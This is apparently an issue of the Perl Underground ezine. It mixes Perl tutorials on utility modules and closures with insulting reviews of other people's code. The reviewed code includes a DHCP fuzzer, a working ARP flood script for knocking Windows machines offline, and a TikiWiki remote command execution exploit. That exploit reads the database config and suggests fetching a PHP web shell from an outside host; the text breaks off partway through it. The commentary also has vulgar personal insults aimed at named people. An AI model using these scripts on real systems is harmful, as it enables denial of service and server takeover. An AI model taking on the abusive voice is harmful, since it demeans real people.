Scalar::Util qw(looks_like_number); my $age; { print "How old are you? "; chomp($age = <STDIN>); print ("$age isn't a number, try again/n"), redo unless looks_like_number $age; } The openhandle function detects whether a reference or glob is connected to an open filehandle: use Scalar::Util qw(openhandle); if (openhandle(*STDIN)) { ... } # glob if (openhandle(/*STDIN)) { ... } # reference The classic way of testing this was to use defined fileno, as in: if (defined fileno $somereference) { ... } However, this breaks down for tied filehandles: BEGIN { package Dummy; sub TIEHANDLE { bless {}, shift } } tie (*FOO, "Dummy"); if (defined fileno *FOO) { ... } # tries to call tied(*FOO)->FILENO if (openhandle *FOO) { ... } # returns true The readonly function detects whether a value is read-only, such as a constant, or a variable that is aliased to a constant: use Scalar::Util qw(readonly); readonly 3; # true readonly $x; # false, unless $x is aliased to a read-only value An example of where this aliasing might occur is in a subroutine call: sub is_readonly { print "$_[0] is "; print "not " unless readonly $_[0]; print "read-only/n"; } is_readonly(3); # prints 3 is read-only is_readonly(my $x = 0); # prints 0 is not read-only I've never used the refaddr function, but it looks like a nice way to detect whether a scalar is a reference or not, and if so, what the memory address might be: use Scalar::Util qw(refaddr); refaddr "hello"; # undef refaddr []; # some numeric value I've seen refaddr used as a key to a hash when constructing inside-out objects. As yet another way to look at references, consider reftype, which returns the primitive type of a reference, or undef otherwise: use Scalar::Util qw(reftype); reftype "hello"; # undef reftype []; # "ARRAY" reftype {}; # "HASH" reftype bless [], "Foo"; # "ARRAY" Note that this differs from the built-in ref because ref returns the blessed class for objects, and can be fooled to return one of the built-in names if you're really perverse: ref bless [], "Foo"; # "Foo" ref bless {}, "ARRAY"; # "ARRAY" (don't do this!) I've also never used the set_prototype function, and subroutine prototypes are generally discouraged, but I'll mention it here anyway for completeness: use Scalar::Util qw(set_prototype); my $s = sub { ... }; set_prototype $s, '$$'; # same as: $s = sub ($$) { ... }; The tainted function determines whether a value is tainted. When Perl is operating with taint enabled, and a value comes in from the dangerous outside world, the value is marked as tainted, and nearly any calculation that uses a tainted in any way also results in a tainted value. If a tainted value is used in a dangerous way, Perl aborts, hopefully saving you from potential harm. use Scalar::Util qw(tainted); tainted "foo"; # false (internal value) tainted $ENV{HOME}; # true if running under -T (external value) $ENV{HOME} = "/"; tainted $ENV{HOME}; # now false The weaken function weakens its lvalue (scalar variable) argument so that the reference contained within the variable is weak. A weak reference still functions as a normal reference with respect to dereferencing, but does not count as a reference when Perl is considering whether there are any references to a value. Incidentally, a copy of a weak reference is not also weak, unless you also weaken it. Typically, weak references are used in self-referential data structures. For example, consider some hashrefs representing nodes in a tree, each of which has an arrayref element of kids pointing at the children, and a parent element pointing back upwards. Let's make the root, and two leaf nodes: my $root = {}; my $leaf1 = { parent => $root }; my $leaf2 = { parent => $root }; and now let's set up the kids in the root: push @$root{kids}, $leaf1, $leaf2; At this point, we have a self-referential data structure. Even if these variables are all lexically local to a subroutine, the subroutine will leak memory each time it is called, because there's always at least one reference to each of three hashes. To fix this, we must weaken the parent links: use Scalar::Util qw(weaken); my $root = {}; my $leaf1 = { parent => $root }; weaken $leaf1->{parent}; my $leaf2 = { parent => $root }; weaken $leaf2->{parent}; push @$root{kids}, $leaf1, $leaf2; Now, we can get from the root to the kids, and from the kids to the root, using the existing references. However, the links from the kids to the root won't count, so Perl treats the literal $root as the only path to that hash. When $root goes out of scope, any weakened references to the hash (as in, the values for each of the parent uplinks) are set to undef. The refcounts of the two kids nodes are also reduced. If $leaf1 and $leaf2 are also going out of scope, then the corresponding hashes are also now unreferenced, causing the entire data structure to disappear. We can detect a weak reference using isweak: use Scalar::Util qw(isweak); isweak $root->{kids}[0]; # false isweak $leaf1->{parent}; # true Note that weaken and isweak appear only when you install the ``XS'' version of the module. That wraps up the Scalar::Util-ity belt. Next month, I'll examine List::Util. Until then, enjoy! # Month zooms by... Last month, I introduced the Scalar::Util super hero of the Scalar/List-Util dynamic duo, describing how a somewhat-overlooked standard library can simplify some of your common tasks. In this month's column, I'll examine List::Util for the help it can provide to your list tasks. I'll also look at List::MoreUtils for some additional common list operations, if you don't mind a quick CPAN install. (And you'll need to install List::Util from the CPAN anyway if you're running something prior to Perl 5.8.) Like Scalar::Util, the List::Util module doesn't export any subroutines by default. That means that you'll need to ask for each of these routines explicitly with use. First, let's look at (the appropriately titled) first. Let's say you have a list of items, and you want to find the first one that is greater than ten characters. Simply pull out first, like this: use List::Util qw(first); my $big_enough = first { length > 10 } @the_list; The first routine walks through the list similar to grep or map, placing each item into $_. The block is then evaluated, looking for a true or false value. If true, the corresponding value of $_ is returned immediately. If every evaluation of the block returns false, then first returns undef. Note that this is similar to: my ($big_enough) = grep { length $_ > 10 } @the_list; However, the first routine avoids testing the remainder of the list once we have found our item of choice. For short lists, we might not care, but for long lists, this can save us some time if we expect a true value somewhat early in the list. We do lose a tiny bit of information with first as well. If undef is a significant return value, we can't tell the undef as one of the list members from the undef returned at the end of the list. For example, if we wanted the ``first undef'' from a list: my $first_undef = first { not defined $_ } @items; we couldn't tell if this was returning a ``found'' undef, or a ``not found'' signal (also undef). In the grep equivalent, we can see whether there are zero or non-zero elements assigned: if (my ($first_undef) = grep { not defined $_ } @items) { # really found an undef } else { # no undef found } Admittedly, I can't recall where I've ever cared that much. But it's an interesting thing to think about when designing return values from functions. But enough on first. Let's move on. The next easy utility to describe from List::Util is shuffle. Yes, many programs need a randomly ordered list of values, and here we have it as a simple word: use List::Util qw(shuffle); my @deck = shuffle map { "C$_", "D$_", "H$_", "S$_" } 0..9, qw(A K Q J); Now our deck of cards is shuffled, and rather fairly and quickly. Like sorting, shuffling is one of those things that looks rather easy to implement, but turns out to have tricky parts to get right. And in the normal List::Util installation, this is implemented at the C level (using XS), so it's quite fast. One of my favorite ``obscure but cool once you understand it'' functions in list-processing languages is reduce, and although Perl doesn't have it is as a built-in, we can at least get to it with List::Util. Similar to sort, reduce takes a block argument that references $a and $b. This is best illustrated by example: use List::Util qw(reduce); my $total = reduce { $a + $b } 1, 2, 4, 8, 16; For the first evaluation of the block, $a and $b take on the first and second elements of the list: 1 and 2 in this case. The block is evaluated (returning 3), and this value is placed back into $a, and the next value is placed in $b (4). Once again, the block is evaluated (7), and the result placed in $a, and a new $b comes from the list. When there are no more items in the list, the result is returned instead. The effect is if we had written: my $total = ((((1 + 2) + 4) + 8) + 16); but scaled for however many elements are in the list. Nice! We can use it to compute a factorial for $n: my $factorial_n = reduce { $a * $b } 1..$n; Or recognize a series of binary digits as a number: my $number = reduce { 2 * $a + $b } 1, 1, 0, 0, 1; # 0b11001 We could even rewrite join in terms of reduce: sub my_join { my $glue = shift; return reduce { $a . $glue . $b } @_; } By adding some smarts into the block, we can find the numeric maximum of a list of values: my $numeric_max = reduce { $a > $b ? $a : $b } @inputs; This works because we select the winner of any given pair of values, and if we keep carrying that winner forward, eventually the winningest winner comes out the end. For a string maximum (``z'' preferred to ``a''), just change the type of the comparison: my $numeric_max = reduce { $a gt $b ? $a : $b } @inputs; And for minimums, we can change the order of the comparison, or swap the selection of $a and $b. For convenience, List::Util provides max, maxstr, min, minstr, and sum directly. I learned Smalltalk long before I learned Perl, and got quite fond of the inject:into: method for collections. The reduce routine maps rather nicely, if I think of Smalltalk's: aCollection inject: firstValue into: [:a :b | "something with a and b"] as Perl's: reduce { "something with $a and $b" } $firstValue, @aCollection; In other words, another way of looking at reduce is that it transforms that first element into the final result by invoking the block in a specific way on all of the remaining elements of the list. So, you could put a list of elements inside an array ref with: my $array_ref = reduce { push @$a, $b; $a } [], @some_list; Or create a hash with: my $hash_ref = reduce { $a->{$b} = 1; $a } {}, @some_list; Note that on each iteration, $a is used, and also returned to become the new $a or the final result. This is reminiscent of the many uses of inject:into: in the Smalltalk images I've seen. That wraps up List::Util, but I've still got a few inches of room here, so let's take a quick look at the CPAN module List::MoreUtils. Although it isn't part of the core, it's referenced in List::Util, because the module provides a few handy shortcuts implemented (again) in C code for speed. Like List::Util all imports must be specifically requested. The any routine returns a boolean result if any of the items in the list meet the given criterion, using a $_ proxy similar to grep or map: use List::MoreUtils qw(any); my $has_some_defined = any { defined $_ } @some_list; This is done efficiently, returning a true value as soon as the block returns a true value, and iterating to the end of the list only if none of the elements meet the condition. Similarly, all computes whether any of the elements fail to meet the condition, returning false as soon as one of the elements fails, rather than iterating through the entire list: use List::MoreUtils qw(all); my $has_no_undef = all { defined $_ } @some_list; Note that you could easily define any in terms of all and vice-versa, just by negating both the condition and the result value. (These items are far more efficient than their same-named ``equivalents'' in Quantum::Superpositions.) If you negate only the result values (or just the condition, depending on how you look at it), you get two other routines defined by List::MoreUtils, none and notall: use List::MoreUtils qw(none notall); my $has_no_defined = none { defined $_ } @some_list; my $has_some_undef = notall { defined $_ } @some_list; Like if vs unless or while vs until, having complementary routines gives you the flexibility to spell out what you're actually looking for, rather than requiring Perl (and the maintenance programmer) to figure out what you mean with a bunch of not operations. If you're just counting true and false values, true and false are at your service: use List::MoreUtils qw(true false); my $bigger_than_10_count = true { $_ > 10 } @some_list; my $not_bigger_than_10_count = false { $_ > 10 } @some_list; Again, these are complementary, so use the one that reads better for your task. The first_index and last_index routines return where an item appears. For example, suppose I want to know which item is the first item that is bigger than 10: use List::MoreUtils qw(first_index); my $where = first_index { $_ > 10 } 1, 2, 4, 8, 16, 32; The result here is 4, indicating that 16 is the first item greater than 10. The index value is 0-based. If the item is not found, -1 is returned, like Perl's built-in index search for strings. last_index works like rindex, working from the upper end of the list rather than the lower end. A more general version of this is indexes (not indices as you might think), which returns all of the index values instead of just the first or last: use List::MoreUtils qw(indexes); my @where = indexes { $_ > 10 } 1, 2, 4, 8, 16, 32; The result is 4, 5, showing that elements 4 and 5 of the input list match the condition. The apply routine is like the built-in map, but automatically localizes the $_ value so we can safely change it within the block: use List::MoreUtils qw(apply); my @no_leading_blanks = apply { s/^/s+// } @input; If we tried to do this with map: my @no_leading_blanks = map { s/^/s+// } @input; then we'd see two problems. First, the result of a substitution is not the new string, but the success value, so the outputs would simply be a series of true and false values. Second, the $_ value is aliased to the inputs, so @input would have been changed. Oops. The equivalent to the apply with map would be something like: my @output = map { local $_ = $_; [apply action here]; $_ } @input; And yes, the many times I've written map blocks that look just like that, I could have replaced them with apply And List::MoreUtils contains a few more routines as well, but I've now run out of space. I hope you find this little trip into the ``utility belts'' of Perl fun and handy. Until next time, enjoy! -[0x09] # Ilja is back, with shit Perl of course ------------------------- #!/usr/bin/perl ## At least your intro is interesting # # dhcp fuzzer, first without options # will do options later ... # # update: - replaced obsolete Net::RawIP with more powerfull Net::Packet # (a bit bitchy to install tho ...) # - added totally unintelligent options fuzzing # # Pretty hackish, but it seems to work ... # version 0.2 By Ilja van Sprundel. # # Todo: - give verbose output # - run in deamon mode, find dhcp id's and remember mac addr # - clean up the protocol implementation (I basicly copypasted what # was in ethereal, ...) # # Net::Packet does a few annoying sleep()'s that I don't need # and they get in the way of fuzzing, so just preload perl # with the following tiny piece of code and all should be well. # ##define LIBC "/lib/libc.so.6" # #int sleep(int sec) { # void *handle; # int r = 0; # int (*osleep)(int); # handle = dlopen(LIBC, 1); # osleep = dlsym(handle, "sleep"); # if (sec != 1) # r = osleep(sec); # dlclose(handle); # return(r); #} # while [ 1 ] ; do LD_PRELOAD=./sleep.so perl dhcpfuzz.pl ; done # bugs found: - dhcpdump (overflow (a plain stacksmash!), NULL ptr deref, # endless loop) # - tcpdump in verbose mode (-vv) slows it down A LOT (becomes # pretty much unworkable) # targets I still want to test: - solaris dhcpd (CMU dhcpd ?) # - ISC dhcpd # - windows dhcpd # - cisco dhcpd # - IBM OS/400 # - wingate dhcpd # - nat32 dhcpd (windows based dhcpd) # No lexical variables? No warnings? # Try these two pragmas: # use strict; # use warnings; use Net::Packet qw($Env); use Net::Packet::ETH; use Net::Packet::IPv4; use Net::Packet::UDP; use Net::Packet::Frame; use Net::Packet::Consts qw(:eth); use Net::Packet::Consts qw(:ipv4); $id = int(rand() * 10000000000) % (0xffffffff + 1); # change # Yea, it needs it. :> if ( int(rand() * 10) ) { $messagetype = int(rand() * 10) % 6; } else { $messagetype = int(rand() * 1000) % 256; } if ( int(rand() * 10) ) { $hwtype = int(rand() * 10) % 6; } else { $hwtype = int(rand() * 1000) % 256; } $hwlen = int(rand() * 1000) % 256; if ( int(rand() * 10) ) { $hops = 0; } else { $hops = int(rand() * 1000) % 256; } if ( int(rand() * 10) ) { $seconds = int(rand() * 10) % 16; } else { $seconds = int(rand() * 100000) % 65536; } if ( int(rand() * 10) ) { $flags = 0x0000; } else { $flags = int(rand() * 100000) % 65536; } # Don't you get annoyed at having this over and over again? $clientip = int(rand() * 10000000000) % (0xffffffff + 1); $yourip = int(rand() * 10000000000) % (0xffffffff + 1); $nextip = int(rand() * 10000000000) % (0xffffffff + 1); $relayip = int(rand() * 10000000000) % (0xffffffff + 1); open($fd, "/dev/urandom"); # Nice call to open() there buddy # open(my $fd, '<', '/dev/urandom') or die "Can't open() /dev/urandom./n"; if ( int(rand() * 10) ) { $clientaddr = "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"; # my $clientaddr = "/x00" x 16; } else { read($fd, $clientaddr, 16); } if ( int(rand() * 10) ) { $sname = "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"; # my $sname = "/x00" x 64; } else { read($fd, $sname, 64); } if ( int(rand() * 10) ) { $file = "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"; # my $file = "/x00" x 128; } else { read($fd, $file, 128); } # # this is the options fuzzing :) h4h4 # # h4h4 1nd33d read($fd, $tmp, (int(rand() * 1000) % 256) ); close($fd); $data = pack("C", $messagetype) . pack("C", $hwtype) . pack("C", $hwlen) . pack("C", $hops) . pack("I", $id) . pack("n",$seconds) . pack("n", $flags) . pack("N", $clientip) . pack("N", $yourip) . pack("N", $nextip) . pack("N", $relayip) . $clientaddr . $sname . $file . $tmp . "/xff"; # Eh, at least you space your # concactination operator nicely, not # like those PHP coders. # But damn you don't realize that pack can take a list print ("Length: " . length($data) . "/n"); # nice parens there # # you gotta love Net::Packet !!!! # # Yup. You also gotta love how your variables suddenly become lexical... # LOOKS LIKE SOMEONE COPIED AND PASTED my $eth = Net::Packet::ETH->new(type => NP_ETH_TYPE_IPv4, dst => "FF:FF:FF:FF:FF:FF"); my $ip = Net::Packet::IPv4->new(src => '0.0.0.0', dst => '255.255.255.255', protocol => NP_IPv4_PROTOCOL_UDP); my $udp = Net::Packet::UDP->new(src => 68, dst => 67); my $content = Net::Packet::Layer7->new(data => $data); my $frame = Net::Packet::Frame->new(l2 => $eth, l3 => $ip, l4 => $udp, l7 => $content); $frame->send; # Nice spacing. # Ilja you sure make it look like you did a lot more work than you did. # You have the creativity of a 19th century Polish serf...motherfucker! # Ilja, how's working at suresec? Are they paying you by the blowjob like # Immunity? -[0x0A] # A little teaser about higher-order functions ------------------- Limbic~Region How A Function Becomes Higher Order All: Higher Order Perl, by Dominus, has become a very popular book. It was written to teach programmers how to transform programs with programs. Many of us who do not have familiarity with Functional Programming are not aware of what a Higher Order function is. It is a function that does at least one of the two following things: Accepts a function as input Returns a function as output For some, you can stop reading here because you already know what Higher Order functions are - you just didn't know that's what they were called. In Perl terminology, we often refer to them as callbacks, factories, and functions that return code refs (usually closures). Even if you are familiar with those terms, you may not be familiar with how to use them. This tutorial is an illustration of how a simple every day function may become higher order, increasing its usefulness in the process. Along the way we will pick up other tricks that can make our code more flexible. Problem: We have a file containing a list of scores and we need to determine the highest score. Using the principal of code reuse and not reinventing the wheel, we turn to our trusty List::Util. use List::Util 'max'; my @scores = <FH>; my $high_score = max(@scores); Unfortunately, this requires all of the scores to be held in memory at one time and our file is really big. Just this once, we decide to break the rules and roll our own. my $high_score; while ( <FH> ) { chomp; $high_score = $_ if ! defined $high_score || $_ > $high_score; } As time goes by "just this once" has happened many times and we decide to make our version reuseable. sub gen_max { # Create an initial default value (or undef) my $max = $_[0]; # Create an anonymous sub that can be # dereferenced and called externally # but will still have access to $max return sub { # Process 1 or more values for ( @_ ) { $max = $_ if ! defined $max || $_ > $max; } return $max; }; } my $max = gen_max(); while ( <FH> ) { chomp; # Dereference and call the anonymous sub # Passing in 1 value at a time $max->($_); } # Get the return value of the anonymous sub my $high_score = $max->(); This is our first step into Higher Order functions as we have returned a function as the output for the sake of reusability. We also have a few advantages over the original List::Util max function. Does not require all values to be present at once Ability to define a starting value Ability to process one or more values at a time Unfortunately, our function breaks the second we start comparing strings instead of numbers. We could make max() and maxstr() functions like List::Util but we want to use the concept of Higher Order functions to increase the versatility of our single function. sub gen_reduce { my $usage = 'Usage: gen_reduce("initial" => $val, "compare" => $code_ref)'; # Hashes need even number of arguments die $usage if @_ % 2; my %opt = @_; # Verify that compare defined and a code reference die $usage if ! defined $opt{compare} || ref $opt{compare} ne 'CODE'; my $compare = $opt{compare}; my $val = $opt{initial}; return sub { for ( @_ ) { # Call the user defined anonymous sub # Passing in two parameters using the return $val = $_ if ! defined $val || $compare->($_, $val); } return $val; }; } # Create an anonymous sub that takes two arguments # A true value is returned if the first is longer my $comp = sub { return length($_[0]) > length($_[1]); } my $maxstr = gen_reduce(compare => $comp ); while ( <FH> ) { chomp; $maxstr->($_); } my $long_str = $maxstr->(); Now our function takes a function as input and returns a function as output. In addition to the previous functionality, we have added a few more features. Named parameters - allows flexibility in ordering and presence of arguments as well as ease in extensibility User defined comparator - our max function has now become a reduce function This does not have to be the end of the journey into Higher Order functions, though it is the end of the tutorial. Whenever you encounter a situation where two programs do nearly identical things but their differences are enough to make using a single function impossible - consider Higher Order functions to bridge the gap. Remember - it is important to always document your interface and assumptions well! I open the floor to comments both on the advantages and disadvantages of Higher Order functions. As they say, there is no such thing as a free lunch and there are always cases in which it makes sense to use distinct routines for distinct problems. -[0x0B] # Intermission --------------------------------------------------- There's a certain personality who narrowly missed being included in this edition. He has been excluded to acknowledge the improvements in his person over the years. He is not who he was; one character died and another spawned. We can't confirm that the new one is any better at Perl, but at least he discloses less shit upon our fair internet. Perhaps you will recognize some of his work? elsif($FORM{'file'} =~ /.(/)*./g){ open(DB, ">>database.txt") or open(DB, ">database.txt"); if ($bannernoton == 0 && $_ =~ m/<html>/ig){ Those three lines, from three different scripts, are all bad in multiple embarassing ways. -[0x0C] # kokanin is washed-up and wrung out ----------------------------- 03:04 < r0ny> who is this ezine? 03:06 < r0ny> http://www.milw0rm.com/papers/88 03:09 < bfamredux> some perl coders 03:09 < kronicd> theres a lot of hate there 03:12 < bfamredux> i don't think it's hate as much as it ripping on people's perl coding 03:15 <@aton> -[0x01] # kokanin sucks -------------------------------------------------- 03:15 <@aton> haha The historians among you might note that kokanin was the very first article in the very first Perl Underground. Here's to our man! #!/usr/bin/perl # kokanin@gmail dot com 20070604 # ARP dos, makes the target windows pc unusable for the duration of the attack. # <mode> determines if we send directly or via broadcast, bcast seems # to be more effective (works even when printing info locally) # Why store mac addresses for addresses outside ones subnet? Weird. # FIXME: sometimes this crashes on the first run due to a slow arp reply use Net::ARP 1.0; use Net::RawIP; $mode = shift; $interface = shift; $host = shift; if(!$host){ print "usage: $0 <bcast|direct> <interface> <host>/n"; exit(-1); } sub r { return int(rand(255)); } if( $mode =~ /direct/ ) { print "sending syn packet to add local ARP entry/n"; $pkt = new Net::RawIP; $pkt->set({ip=>{daddr=>$host},tcp=>{source=>int(rand(65535)),dest=>int(ran d(65535)),syn=>1,seq=>0,ack=>0}}); $pkt->send; print "looking up mac address/n"; $dmac = Net::ARP::arp_lookup($interface,$host); } else { $dmac = "ff:ff:ff:ff:ff:ff"; } print "sending arp packets, press ctrl-c to stop/n"; while(){ $randip = sprintf("%d.%d.%d.%d",r(),r(),r(),r()); $smac = sprintf("%x:%x:%x:%x:%x:%x",r(),r(),r(),r(),r(),r()); # this slows it down. # if( $mode =~ /bcast/ ) { print "$interface://$randip/$smac -> $host/$dmac/n"; } Net::ARP::send_packet( $interface,$randip,$host,$smac,$dmac,request); } A lot needs to change in this script. strict and warnings should be in effect. Lexical variables, @ARGV over triple shifting, decent spacing and parenthesis removal, etc. However, we include this here to actually commend kokanin in a way. Basically, we think he's come a long way in a few years and this program is respectable in this world of shit code. Congrats kokanin, here's to mediocracy! -[0x0D] # broquaint always writes nice articles -------------------------- Closure on Closures by broquaint Closure on Closures Before we get into this tutorial we need to define what a closure is. The Camel (3rd edition) states that a closure is "when you define an anonymous function in a particular lexical scope at any particular moment" However, I believe this isn't entirely accurate as a closure in perl can be any subroutine referring to lexical variables in the surrounding lexical scopes.[0] Now with that (simple?) definition out of the way, we can get on with the show! Before we get started ... For one to truely understand closures a solid understanding of the principles of lexical scoping is needed, as closures are implemented through the means of lexical scoping interacting with subroutines. For an introduction to lexical scoping in perl see Lexical scoping like a fox, and once you're done with that, head on back. Right, are we all here now? Bueller ... Bueller .. Bueller? Good. Now that we have our basic elements, let's weave them together with a stitch of explanation and a thread of code. Hanging around Now as we all know, lexical variables are only active for the length of the surrounding lexical scope, but can be kept around in an indirect manner if something else references them e.g 1: sub DESTROY { print "stick a fork in '$_[0]' it's done/n" } 2: 3: my $foo = bless []; 4: { 5: my $bar = bless {}; 6: ## keep $bar around 7: push @$foo => /$bar; 8: 9: print "in /$bar's [$bar] lexical scope/n"; 10: } 11: 12: print "we've left /$bar's lexical scope/n"; __output__ in $bar's [main=HASH(0x80fbbf0)] lexical scope we've left $bar's lexical scope stick a fork in 'main=ARRAY(0x80fbb0c)' it's done stick a fork in 'main=HASH(0x80fbbf0)' it's done The above example illustrates that $bar isn't cleaned up until $foo, which references it, leaves the surrounding lexical scope (the file-level scope in this case). So from that we can see lexical variables only stick around for the length of the surrounding scope or until they're no longer referenced. But what if we were to re-enter a scope where a variable is still visible, but the scope has already exited - will the variable still exist? 1: { 2: my $foo = "a string"; 3: INNER: { 4: print "/$foo: [$foo]/n"; 5: } 6: } 7: goto INNER unless $i++; __output__ $foo: [a string] $foo: [] As we can see the answer is categorically 'No'. In retrospect this is quite obvious as $foo has gone out of scope and there is no longer a reference to it. A bit of closure However, the last example just used a simple bareblock, now let's try it with a subroutine as the inner block 1: { 2: my $foo = "a string"; 3: sub inner { 4: print "/$foo: [$foo]/n"; 5: } 6: } 7: inner(); 8: inner(); __output__ $foo: [a string] $foo: [a string] "Hold on there cowboy - $foo has already gone out of scope at the time of the first call to inner() let alone the second, what's going on there?!?", or so one might say. Now hold your horses, there is a very good reason for this behaviour - the subroutine in the example is a closure. "Ok, so it's a closure, but why?", would be a good question at this point. The reason is that subroutines in perl have what's called a scratchpad which holds references to any lexical variables referred to within the subroutine. This means that you can directly access lexical variables within subroutines even though the given variables' scope has exited. Hmmm, that was quite a lot of raw info, so let's break it down somewhat. Firstly subroutines can hold onto variables from higher lexical scopes. Here's a neat little counter example (not counter-example ;) 1: { 2: my $cnt = 5; 3: sub counter { 4: return $cnt--; 5: } 6: } 7: 8: while(my $i = counter()) { 9: print "$i/n"; 10: } 11: print "BOOM!/n"; __output__ 5 4 3 2 1 BOOM! While not immediately useful, the above example does demonstrate a subroutine counter() (line 3) holding onto a variable $cnt (line 2) after it has gone out of scope. Because of this behaviour of capturing lexical state the counter() subroutine acts as a closure. Now if we look at the above example a little closer we might notice that it looks like the beginnings of a basic iterator. If we just tweak counter() and have it return an anonymous sub we'll have ourselves a very simple iterator 1: sub counter { 2: my $cnt = shift; 3: return sub { $cnt-- }; 4: } 5: 6: my $cd = counter(5); 7: while(my $i = $cd->()) { 8: print "$i/n"; 9: } 10: 11: print "BOOM!/n"; __output__ 5 4 3 2 1 BOOM! Now instead of counter() being the closure we return an anonymous subroutine (line 3) which becomes a closure as it holds onto $cnt (line 2). Every time the newly created closure is executed the $cnt passed into counter() is returned and decremented (this post-return modification behaviour is due to the nature of the post-decrement operator, not the closure). So if we further apply the concepts of closures we can write ourselves a very basic directory iterator 1: use IO::Dir; 2: 3: sub dir_iter { 4: my $dir = IO::Dir->new(shift) or die("ack: $!"); 5: 6: return sub { 7: my $fl = $dir->read(); 8: $dir->rewind() unless defined $fl; 9: return $fl; 10: }; 11: } 12: 13: my $di = dir_iter( "." ); 14: while(defined(my $f = $di->())) { 15: print "$f/n"; 16: } __output__ . .. .closuretut.html.swp closuretut.html example5.pl example6.pl example2.pl example1.pl example3.pl example4.pl example7.pl In the code above dir_iter() (line 3) is returning an anonymous subroutine (line 6) which is holding $dir (line 4) from a higher scope and therefore acts as a closure. So we've created a very basic directory iterator using a simple closure and a little bit of help from IO::Dir. Wrapping it up This method of creating closures using anonymous subroutines can be very powerful[1]. With the help of Richard Clamp's marvellous File::Find::Rule we can build ourselves a handy little grep like tool for XML files 1: use strict; 2: use warnings; 3: 4: use XML::Simple; 5: use Getopt::Std; 6: use File::Basename; 7: use File::Find::Rule; 8: use Data::Dumper; 9: 10: $::PROGRAM = basename $0; 11: 12: getopts('n:t:hr', my $opts = {}); 13: 14: usage() if $opts->{h} or @ARGV == 0; 15: 16: my @dirs = $opts->{r} ? @ARGV : map dirname($_), @ARGV; 17: my @files = $opts->{r} ? '*.xml' : map basename($_), @ARGV; 18: my $callback = gensub($opts); 19: 20: my @found = find( 21: file => 22: name => /@files, 23: ## handy callback which wraps around the callback created above 24: exec => sub { $callback->( XMLin $_[-1] ) }, 25: in => [ @dirs ] 26: ); 27: 28: print "$::PROGRAM: no files matched the search criteria/n" and exit(0) 29: if @found == 0; 30: 31: print "$::PROGRAM: the following files matched the search criteria/n", 32: map "/t$_/n", @found; 33: 34: exit(0); 35: 36: sub usage { 37: print "Usage: $::PROGRAM -t TEXT [-n NODE -h -r] FILES/n"; 38: exit(0); 39: } 40: 41: sub gensub { 42: my $opts = shift; 43: 44: ## basic matcher wraps around the program options 45: return sub { Dumper($_[0]) =~ //Q$opts->{t}/sm } 46: unless exists $opts->{n}; 47: 48: ## node based matcher wraps around options and itself! 49: my $self; $self = sub { 50: my($tree, $seennode) = @_; 51: 52: for(keys %$tree) { 53: $seennode = 1 if $_ eq $opts->{n}; 54: 55: if( ref $tree->{$_} eq 'HASH') { 56: return $self->($tree->{$_}, $seennode); 57: } elsif( ref $tree->{$_} eq 'ARRAY') { 58: return !!grep $self->($_, $seennode), @{ $tree->{$_} }; 59: } else { 60: next unless $seennode; 61: return !!1 62: if $tree->{$_} =~ //Q$opts->{t}/; 63: } 64: } 65: return; 66: }; 67: 68: return $self; 69: } Disclaimer: the above isn't thoroughly tested and isn't nearly perfect so think twice before using in the real world The code above contains 3 simple examples of closures using anonymous subroutines (in this case acting as callbacks). The first closure can be found on in the exec parameter (line 24) of the find call. This is wrapping around the $callback variable generated by the gensub() function. Then within the gensub() (line 41) there are 2 closures which wrap around the $opts lexical, the second of which also wraps around $self which is a reference to the callback which is returned. Altogether now So let's bring it altogether now - a closure is a subroutine which wraps around lexical variables that it references from the surrounding lexical scope which subsequently means that the lexical variables that are referenced are not garbage collected when their immediate scope is exited. There ya go, closure on closures! Hopefully this tutorial has conveyed the meaning and purpose of closures in perl and hasn't been too confounding along the way. Thanks to virtualsue, castaway, Corion, xmath, demerphq, Petruchio, tye for help during the construction of this tutorial [0] see. chip's Re: Toggling between two values for a more technical definition (and discussion) of closures within perl [1] see. tilly's Re (tilly) 9: Why are closures cool?, on the pitfalls of nested package level subroutines vs. anonymous subroutines when dealing with closures -[0x0E] # str0ke's token appearance -------------------------------------- #!/usr/bin/perl # TikiWiki <= 1.9.8 Remote Command Execution Exploit # # Description # ----------- # TikiWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. # The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input # supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP # commands resulting in a loss of integrity. # ----------- # Vulnerability discovered by ShAnKaR <sec [at] shankar.antichat.ru> # # $Id: milw0rm_tikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $ # Wow, five issues and five pieces of code by str0ke! # We debated not including him in here, but hey, it's like a tradition now. use strict; # Hey, you're learning! But you still forgot to enable warnings. use LWP::UserAgent; my $target = shift || &usage(); # Oh my... how 1996 my $proxy = shift; my $command; # Try this: # my($target, $proxy) = @ARGV; &exploit($target, "cat db/local.php", $proxy); # Wow, another flashback! print "[?] php shell it?/n";; print "[*] wget http://www.youhost.com/yourshell.txt -O backups/shell.php/n"; print "[*] lynx " . $target . "/backups/shell.php/n/n"; while() { print "tiki/# "; chomp($command = <STDIN>); # You do realize that you can declare # $command down here right? # chomp(my $command = <STDIN>); # Then we can lose that annoying # decleration up at the top of the code. exit unless $command; # Not bad. &exploit($target, $command, $proxy); # You really must like the &'s, eh? } sub usage() { print "[?] TikiWiki <= 1.9.8 Remote Command Execution Exploit/n"; # ph33r print "[?] str0ke <str0ke[!]milw0rm.com>/n"; print "[?] usage: perl $0 